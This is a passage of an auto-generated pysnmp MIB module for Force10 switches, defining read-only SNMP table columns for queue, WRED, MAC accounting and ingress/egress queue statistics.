if mibBuilder.loadTexts: f10InQueueBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 2.0 (C2T2) hardware only. ')
f10InQueuePktsCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 2, 1, 9), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10InQueuePktsCount.setStatus('current')
if mibBuilder.loadTexts: f10InQueuePktsCount.setDescription('The cumulative number of packets passing through this queue. This object is available on Cyclone version 2.0 (C2T2) hardware only. ')
f10OutQueueStatisticsTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3), )
if mibBuilder.loadTexts: f10OutQueueStatisticsTable.setStatus('current')
if mibBuilder.loadTexts: f10OutQueueStatisticsTable.setDescription('The Force10 QOS Output Queue Statistics Table. This table provides Output Queue statistics for Force10 Interfaces. ')
f10OutQueueStatisticsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "FORCE10-MONITORING-MIB", "f10OutQueueId"))
if mibBuilder.loadTexts: f10OutQueueStatisticsEntry.setStatus('current')
if mibBuilder.loadTexts: f10OutQueueStatisticsEntry.setDescription('An entry in the Output Queue table. The Output Queue Statistics Table is indexed by the Interface and the Queue ID. The Interface index should be an valid ifIndex as defined in the RFC1213 MIB II Interface Table and the the Queue ID should be a valid Force10 Queue ID. ')
f10OutQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1, 1), F10QueueID()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10OutQueueId.setStatus('current')
if mibBuilder.loadTexts: f10OutQueueId.setDescription('This is the second index of this table, it must be a valid Force10 QOS Queue ID. ')
f10OutQueuePackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1, 2), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10OutQueuePackets.setStatus('current')
if mibBuilder.loadTexts: f10OutQueuePackets.setDescription(' ')
f10OutQueueBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1, 3), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10OutQueueBytes.setStatus('current')
if mibBuilder.loadTexts: f10OutQueueBytes.setDescription('The number of bytes in the queue. This object is available on Cyclone version 1.5 (CjTj) hardware only. ')
f10OutQueueBps = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10OutQueueBps.setStatus('current')
if mibBuilder.loadTexts: f10OutQueueBps.setDescription(' ')
f10OutQueueCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1, 5), F10CycloneVersion()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10OutQueueCycloneVersion.setStatus('current')
if mibBuilder.loadTexts: f10OutQueueCycloneVersion.setDescription('The linecard Cyclone hardware version. ')
f10OutQueueBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 3, 1, 6), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10OutQueueBytesCount.setStatus('current')
if mibBuilder.loadTexts: f10OutQueueBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 2.0 (C2T2) hardware only. ')
f10WredStatisticsTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4), )
if mibBuilder.loadTexts: f10WredStatisticsTable.setStatus('current')
if mibBuilder.loadTexts: f10WredStatisticsTable.setDescription('QOS WRED Statistics Table This table provides QOS WRED statistics for the Force10 Interfaces. ')
f10WredStatisticsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "FORCE10-MONITORING-MIB", "f10WredQueueId"))
if mibBuilder.loadTexts: f10WredStatisticsEntry.setStatus('current')
if mibBuilder.loadTexts: f10WredStatisticsEntry.setDescription('An entry in the WRED Statistics table. The WRED Statistics Table is indexed by the Interface and the Queue ID. The Interface index should be an valid ifIndex as defined in the RFC1213 MIB II Interface Table and the Queue ID should be a valid Force10 Queue ID. ')
f10WredQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 1), F10QueueID()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10WredQueueId.setStatus('current')
if mibBuilder.loadTexts: f10WredQueueId.setDescription('This is the second index of this table, it must be a valid Force10 QOS Queue ID. ')
f10WredGreenName = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10WredGreenName.setStatus('current')
if mibBuilder.loadTexts: f10WredGreenName.setDescription(' ')
f10WredGreenThresholdLow = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 3), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10WredGreenThresholdLow.setStatus('current')
if mibBuilder.loadTexts: f10WredGreenThresholdLow.setDescription(' ')
f10WredGreenThresholdHigh = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 4), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10WredGreenThresholdHigh.setStatus('current')
if mibBuilder.loadTexts: f10WredGreenThresholdHigh.setDescription(' ')
f10WredGreenDropPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 5), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10WredGreenDropPackets.setStatus('current')
if mibBuilder.loadTexts: f10WredGreenDropPackets.setDescription(' ')
f10WredGreenReserve1 = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 6), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10WredGreenReserve1.setStatus('current')
if mibBuilder.loadTexts: f10WredGreenReserve1.setDescription(' ')
f10WredGreenReserve2 = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 7), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10WredGreenReserve2.setStatus('current')
if mibBuilder.loadTexts: f10WredGreenReserve2.setDescription(' ')
f10WredYellowName = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 8), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10WredYellowName.setStatus('current')
if mibBuilder.loadTexts: f10WredYellowName.setDescription(' ')
f10WredYellowThresholdLow = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 9), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10WredYellowThresholdLow.setStatus('current')
if mibBuilder.loadTexts: f10WredYellowThresholdLow.setDescription(' ')
f10WredYellowThresholdHigh = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 10), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10WredYellowThresholdHigh.setStatus('current')
if mibBuilder.loadTexts: f10WredYellowThresholdHigh.setDescription(' ')
f10WredYellowDropPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 11), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10WredYellowDropPackets.setStatus('current')
if mibBuilder.loadTexts: f10WredYellowDropPackets.setDescription(' ')
f10WredYellowReserve1 = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 12), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10WredYellowReserve1.setStatus('current')
if mibBuilder.loadTexts: f10WredYellowReserve1.setDescription(' ')
f10WredYellowReserve2 = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 13), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10WredYellowReserve2.setStatus('current')
if mibBuilder.loadTexts: f10WredYellowReserve2.setDescription(' ')
f10WredRedName = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 14), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10WredRedName.setStatus('current')
if mibBuilder.loadTexts: f10WredRedName.setDescription(' ')
f10WredRedThresholdLow = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 15), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10WredRedThresholdLow.setStatus('current')
if mibBuilder.loadTexts: f10WredRedThresholdLow.setDescription(' ')
f10WredRedThresholdHigh = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 16), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10WredRedThresholdHigh.setStatus('current')
if mibBuilder.loadTexts: f10WredRedThresholdHigh.setDescription(' ')
f10WredRedDropPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 17), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10WredRedDropPackets.setStatus('current')
if mibBuilder.loadTexts: f10WredRedDropPackets.setDescription(' ')
f10WredRedReserve1 = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 18), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10WredRedReserve1.setStatus('current')
if mibBuilder.loadTexts: f10WredRedReserve1.setDescription(' ')
f10WredRedReserve2 = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 2, 4, 1, 19), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10WredRedReserve2.setStatus('current')
if mibBuilder.loadTexts: f10WredRedReserve2.setDescription(' ')
f10MacGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 1))
f10MacAccounting = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2))
f10MacAccountingDestTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1), )
if mibBuilder.loadTexts: f10MacAccountingDestTable.setStatus('current')
if mibBuilder.loadTexts: f10MacAccountingDestTable.setDescription('The MAC Accounting Destination Table. Each entry in the table provides the MAC accounting statistics from a specific Interface, VLAN ID, and the desired destination MAC Address. ')
f10MacAccountingDestEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1), ).setIndexNames((0, "FORCE10-MONITORING-MIB", "f10MacAccInIfIndex"), (0, "FORCE10-MONITORING-MIB", "f10MacAccVlan"), (0, "FORCE10-MONITORING-MIB", "f10MacAccMacAddr"))
if mibBuilder.loadTexts: f10MacAccountingDestEntry.setStatus('current')
if mibBuilder.loadTexts: f10MacAccountingDestEntry.setDescription('An entry in the MAC Accounting Destination Table. The MAC Accounting Destination table is indexed by the input Interface, VLAN ID, and the destination MAC Address. ')
f10MacAccInIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10MacAccInIfIndex.setStatus('current')
if mibBuilder.loadTexts: f10MacAccInIfIndex.setDescription('The input Interface of this entry of the table. The value should be a valid ifIndex in the MIB II Interface Table. ')
f10MacAccVlan = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1, 2), F10VlanID()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10MacAccVlan.setStatus('current')
if mibBuilder.loadTexts: f10MacAccVlan.setDescription('The VLAN ID. ')
f10MacAccMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1, 3), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10MacAccMacAddr.setStatus('current')
if mibBuilder.loadTexts: f10MacAccMacAddr.setDescription("The MAC Address that identifies this entry of the table. This is the destination MAC Address of the packets that's going through the Interface identified by f10MacAccInIfIndex. ")
f10MacAccOutIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10MacAccOutIfIndex.setStatus('current')
if mibBuilder.loadTexts: f10MacAccOutIfIndex.setDescription('The output Interface of this entry of the table. The value should be a valid ifIndex in the MIB II Interface Table. ')
f10MacAccPackets = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1, 5), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10MacAccPackets.setStatus('current')
if mibBuilder.loadTexts: f10MacAccPackets.setDescription('The number of packets going through this entry of the the table, identified by the Interface/MAC/VLAN. ')
f10MacAccBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 3, 2, 1, 1, 6), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10MacAccBytes.setStatus('current')
if mibBuilder.loadTexts: f10MacAccBytes.setDescription('The number of bytes traffic going through this entry of the table, identified by the Interface/MAC/VLAN. ')
f10MonIfQueueGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 1))
f10IngQueueUnicastStatTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2), )
if mibBuilder.loadTexts: f10IngQueueUnicastStatTable.setStatus('current')
if mibBuilder.loadTexts: f10IngQueueUnicastStatTable.setDescription('The Ingress Queue Unicast Statistics Table. This table provides Queue statistics for Ingress Unicast packets between Force10 linecards. ')
f10IngQueueUnicastStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1), ).setIndexNames((0, "FORCE10-MONITORING-MIB", "f10IngUnicastSrcCard"), (0, "FORCE10-MONITORING-MIB", "f10IngUnicastDestCard"), (0, "FORCE10-MONITORING-MIB", "f10IngUnicastSrcPortPipe"), (0, "FORCE10-MONITORING-MIB", "f10IngUnicastDestPortPipe"), (0, "FORCE10-MONITORING-MIB", "f10IngUnicastQueueId"))
if mibBuilder.loadTexts: f10IngQueueUnicastStatEntry.setStatus('current')
if mibBuilder.loadTexts: f10IngQueueUnicastStatEntry.setDescription('An entry in the Ingress Queue Unicast Statistics table. The Ingress Queue Unicast Statistics Table is indexed by the source and destination linecard/portpipe and Queue ID. ')
f10IngUnicastSrcCard = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 1), F10SlotID()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngUnicastSrcCard.setStatus('current')
if mibBuilder.loadTexts: f10IngUnicastSrcCard.setDescription('This is the source linecard number. This is the first index of this table entry. ')
f10IngUnicastDestCard = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 2), F10SlotID()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngUnicastDestCard.setStatus('current')
if mibBuilder.loadTexts: f10IngUnicastDestCard.setDescription('This is the destination linecard number. This is the 3rd index of this table entry. ')
f10IngUnicastSrcPortPipe = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 3), F10PortPipeID()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngUnicastSrcPortPipe.setStatus('current')
if mibBuilder.loadTexts: f10IngUnicastSrcPortPipe.setDescription('This is the Force10 Cyclone PortPipe number of the source linecard. This is the 2nd index of this table entry. ')
f10IngUnicastDestPortPipe = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 4), F10PortPipeID()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngUnicastDestPortPipe.setStatus('current')
if mibBuilder.loadTexts: f10IngUnicastDestPortPipe.setDescription('This is the Force10 Cyclone PortPipe number of the destination linecard. This is the 4th index of this table entry. ')
f10IngUnicastQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 5), F10QueueID()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngUnicastQueueId.setStatus('current')
if mibBuilder.loadTexts: f10IngUnicastQueueId.setDescription('This is the Queue ID of this entry. This is the 5th index of this table entry. ')
f10IngUnicastCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 6), F10CycloneVersion()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngUnicastCycloneVersion.setStatus('current')
if mibBuilder.loadTexts: f10IngUnicastCycloneVersion.setDescription('The linecard Cyclone hardware version. ')
f10IngUnicastBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 7), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngUnicastBytes.setStatus('current')
if mibBuilder.loadTexts: f10IngUnicastBytes.setDescription('The number of bytes in the queue. This object is available on Cyclone version 1.5 (CjTj) hardware only. ')
f10IngUnicastBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 8), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngUnicastBytesCount.setStatus('current')
if mibBuilder.loadTexts: f10IngUnicastBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ')
f10IngUnicastPacketCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 9), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngUnicastPacketCount.setStatus('current')
if mibBuilder.loadTexts: f10IngUnicastPacketCount.setDescription('The cumulative number of packets passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ')
f10IngUnicastGreenMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 10), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngUnicastGreenMin.setStatus('current')
if mibBuilder.loadTexts: f10IngUnicastGreenMin.setDescription('The min threshold for Green packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ')
f10IngUnicastGreenMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 11), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngUnicastGreenMax.setStatus('current')
if mibBuilder.loadTexts: f10IngUnicastGreenMax.setDescription('The max threshold for Green packets. The max threshold identifies the queue size level at which tail drops occurs. ')
f10IngUnicastGreenDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 12), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngUnicastGreenDrop.setStatus('current')
if mibBuilder.loadTexts: f10IngUnicastGreenDrop.setDescription('The number of Green packets being dropped in this queue. ')
f10IngUnicastYellowMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 13), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngUnicastYellowMin.setStatus('current')
if mibBuilder.loadTexts: f10IngUnicastYellowMin.setDescription('The min threshold for Yellow packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ')
f10IngUnicastYellowMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 14), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngUnicastYellowMax.setStatus('current')
if mibBuilder.loadTexts: f10IngUnicastYellowMax.setDescription('The max threshold for Yellow packets. The max threshold identifies the queue size level at which tail drops occurs. ')
f10IngUnicastYellowDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 15), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngUnicastYellowDrop.setStatus('current')
if mibBuilder.loadTexts: f10IngUnicastYellowDrop.setDescription('The number of Yellow packets being dropped in this queue. ')
f10IngUnicastRedDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 16), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngUnicastRedDrop.setStatus('current')
if mibBuilder.loadTexts: f10IngUnicastRedDrop.setDescription('The number of Red packets being dropped in this queue. ')
f10IngQueueMulticastStatTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3), )
if mibBuilder.loadTexts: f10IngQueueMulticastStatTable.setStatus('current')
if mibBuilder.loadTexts: f10IngQueueMulticastStatTable.setDescription('The Ingress Queue Multicast Statistics Table. This table provides Queue statistics for Ingress Multicast packets at Force10 linecards. ')
f10IngQueueMulticastStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1), ).setIndexNames((0, "FORCE10-MONITORING-MIB", "f10IngMulticastSrcCard"), (0, "FORCE10-MONITORING-MIB", "f10IngMulticastSrcPortPipe"), (0, "FORCE10-MONITORING-MIB", "f10IngMulticastQueueId"))
if mibBuilder.loadTexts: f10IngQueueMulticastStatEntry.setStatus('current')
if mibBuilder.loadTexts: f10IngQueueMulticastStatEntry.setDescription('An entry in the Ingress Queue Multicast Statistics table. The Ingress Queue Multicast Statistics Table is indexed by the source linecard/portpipe and Queue ID. ')
f10IngMulticastSrcCard = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 1), F10SlotID()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngMulticastSrcCard.setStatus('current')
if mibBuilder.loadTexts: f10IngMulticastSrcCard.setDescription('This is the source linecard number. This is the first index of this table entry. ')
f10IngMulticastSrcPortPipe = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 2), F10PortPipeID()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngMulticastSrcPortPipe.setStatus('current')
if mibBuilder.loadTexts: f10IngMulticastSrcPortPipe.setDescription('This is the Force10 Cyclone PortPipe number of the source linecard. This is the 2nd index of this table entry. ')
f10IngMulticastQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 3), F10QueueID()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngMulticastQueueId.setStatus('current')
if mibBuilder.loadTexts: f10IngMulticastQueueId.setDescription('This is the Queue ID of this entry. This is the 3rd index of this table entry. ')
f10IngMulticastCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 4), F10CycloneVersion()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngMulticastCycloneVersion.setStatus('current')
if mibBuilder.loadTexts: f10IngMulticastCycloneVersion.setDescription('The linecard Cyclone hardware version. ')
f10IngMulticastBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 5), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngMulticastBytes.setStatus('current')
if mibBuilder.loadTexts: f10IngMulticastBytes.setDescription('The number of bytes in the queue. This object is available on Cyclone version 1.5 (CjTj) hardware only. ')
f10IngMulticastBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 6), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngMulticastBytesCount.setStatus('current')
if mibBuilder.loadTexts: f10IngMulticastBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ')
f10IngMulticastPacketCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 7), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngMulticastPacketCount.setStatus('current')
if mibBuilder.loadTexts: f10IngMulticastPacketCount.setDescription('The cumulative number of packets passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ')
f10IngMulticastGreenMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 8), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngMulticastGreenMin.setStatus('current')
if mibBuilder.loadTexts: f10IngMulticastGreenMin.setDescription('The min threshold for Green packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ')
f10IngMulticastGreenMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 9), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngMulticastGreenMax.setStatus('current')
if mibBuilder.loadTexts: f10IngMulticastGreenMax.setDescription('The max threshold for Green packets. The max threshold identifies the queue size level at which tail drops occurs. ')
f10IngMulticastGreenDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 10), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngMulticastGreenDrop.setStatus('current')
if mibBuilder.loadTexts: f10IngMulticastGreenDrop.setDescription('The number of Green packets being dropped in this queue. ')
f10IngMulticastYellowMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 11), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngMulticastYellowMin.setStatus('current')
if mibBuilder.loadTexts: f10IngMulticastYellowMin.setDescription('The min threshold for Yellow packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ')
f10IngMulticastYellowMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 12), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngMulticastYellowMax.setStatus('current')
if mibBuilder.loadTexts: f10IngMulticastYellowMax.setDescription('The max threshold for Yellow packets. The max threshold identifies the queue size level at which tail drops occurs. ')
f10IngMulticastYellowDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 13), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngMulticastYellowDrop.setStatus('current')
if mibBuilder.loadTexts: f10IngMulticastYellowDrop.setDescription('The number of Yellow packets being dropped in this queue. ')
f10IngMulticastRedDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 14), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10IngMulticastRedDrop.setStatus('current')
if mibBuilder.loadTexts: f10IngMulticastRedDrop.setDescription('The number of Red packets being dropped in this queue. ')
f10EgQueueUnicastStatTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4), )
if mibBuilder.loadTexts: f10EgQueueUnicastStatTable.setStatus('current')
if mibBuilder.loadTexts: f10EgQueueUnicastStatTable.setDescription('The Egress Queue Unicast Statistics Table. This table provides Queue statistics for Egress Unicast packets at Force10 Interface. ')
f10EgQueueUnicastStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "FORCE10-MONITORING-MIB", "f10EgUnicastQueueId"))
if mibBuilder.loadTexts: f10EgQueueUnicastStatEntry.setStatus('current')
if mibBuilder.loadTexts: f10EgQueueUnicastStatEntry.setDescription('An entry in the Egress Queue Unicast Statistics table. The Egress Queue Unicast Statistics Table is indexed by the ifIndex and Queue ID. The IfIndex should be an valid Interface Index as defined in the RFC1213 MIB II Interface Table. ')
f10EgUnicastQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 1), F10QueueID()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgUnicastQueueId.setStatus('current')
if mibBuilder.loadTexts: f10EgUnicastQueueId.setDescription('This is the Queue ID of this entry. This is the 2nd index of this table entry. ')
f10EgUnicastCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 2), F10CycloneVersion()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgUnicastCycloneVersion.setStatus('current')
if mibBuilder.loadTexts: f10EgUnicastCycloneVersion.setDescription('The linecard Cyclone hardware version. ')
f10EgUnicastBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 3), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgUnicastBytes.setStatus('current')
if mibBuilder.loadTexts: f10EgUnicastBytes.setDescription('The number of bytes in the queue. This object is available on Cyclone version 1.5 (CjTj) hardware only. ')
f10EgUnicastBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgUnicastBytesCount.setStatus('current')
if mibBuilder.loadTexts: f10EgUnicastBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ')
f10EgUnicastPacketCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 5), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgUnicastPacketCount.setStatus('current')
if mibBuilder.loadTexts: f10EgUnicastPacketCount.setDescription('The cumulative number of packets passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ')
